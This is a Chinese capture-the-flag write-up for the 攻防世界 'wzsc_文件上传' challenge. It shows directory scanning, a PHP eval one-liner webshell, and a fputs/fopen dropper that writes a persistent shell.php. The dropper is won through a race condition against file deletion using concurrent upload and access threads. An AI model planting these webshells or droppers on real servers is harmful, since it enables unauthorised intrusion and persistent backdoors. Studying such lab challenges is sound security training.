攻防世界——wzsc_文件上传

拿到靶机后有一个文件上传界面

随便传个文本看看有什么返回

上传后页面跳转到upload.php

但这里什么也没有

用dirsearch扫一下

发现有一个flag.php文件,并且还有一个upload目录

访问flag.php文件

也是什么都没有

访问upload目录

发现了我们刚刚上传的文本

那就说明文件上传的路径在upload目录下

写一句话木马上传

复制代码
<?php @eval($_POST['rc'];?>

上传成功

但是找不到文件

猜测是文件在上传之后就被删除了

这里我们可以利用条件竞争漏洞进行文件上传

服务器处理代码时总会存在一定的时间差 ,当我们在上传文件后就多次快速尝试访问目标文件,那么是不是有机会在删除前成功访问文件。而如果文件的代码是重新创建一个木马文件,新木马文件则永远不会被删除了!

构造木马

复制代码
<?php fputs(fopen("shell.php", "w"), '<?php @eval($_POST["shell"]); ?>'); ?>

直接使用<?php @eval(_POST\["shell"\]); ?\>的Webshell会随着原始文件被删除而失效。而通过fopen/fputs方式: **\_POST["shell"]); ?>'); ?>**

这段代码会在服务器上创建一个全新的、独立的文件,不受原始上传文件生命周期的影响,提供持久化的后门访问。

构造条件竞争进程

首先,需要设置两个,一个为上传包进程,一个为访问包进程,

只要在没有被删除前访问到木马文件就可以上传一句话木马。

其中访问进程需大于上传进程。

构造上传进程

构造上传post地址池,并发线程为30

构造上传程序

勾选一个影响不大的东西,这里勾选的东西需要确保置换为空时不产生影响的

构造访问进程

构造访问require地址池,并发线程为50

成功了

蚁剑访问

相关推荐
TTTao233331 分钟前
自用Android项目框架备份
android
zjeweler43 分钟前
网安护网面试-2-国誉护网面试
web安全·网络安全·面试·职场和发展·护网行动·护网面试
沃尔威武1 小时前
性能调优实战:从火焰图定位到SQL优化的全流程
android·数据库·sql
Fᴏʀ ʏ꯭ᴏ꯭ᴜ꯭.1 小时前
基于MySQL一主一从环境添加多个新从库
android·mysql·adb
JJay.3 小时前
Android App Functions 深入理解
android
pencek3 小时前
HakcMyVM-Quick
网络安全
身如柳絮随风扬3 小时前
Servlet:访问流程、核心接口与生命周期
java·servlet·web
开发_李行3 小时前
简历对应知识点总结--专业技能5
android
程序员晓晓4 小时前
【网络安全零基础入门】应急响应之服务器入侵排查,小白零基础入门到精通教程
服务器·web安全·计算机·网络安全·渗透测试·黑客技术·网安应急响应
网络安全许木4 小时前
自学渗透测试(1~6天工具使用的回温)
android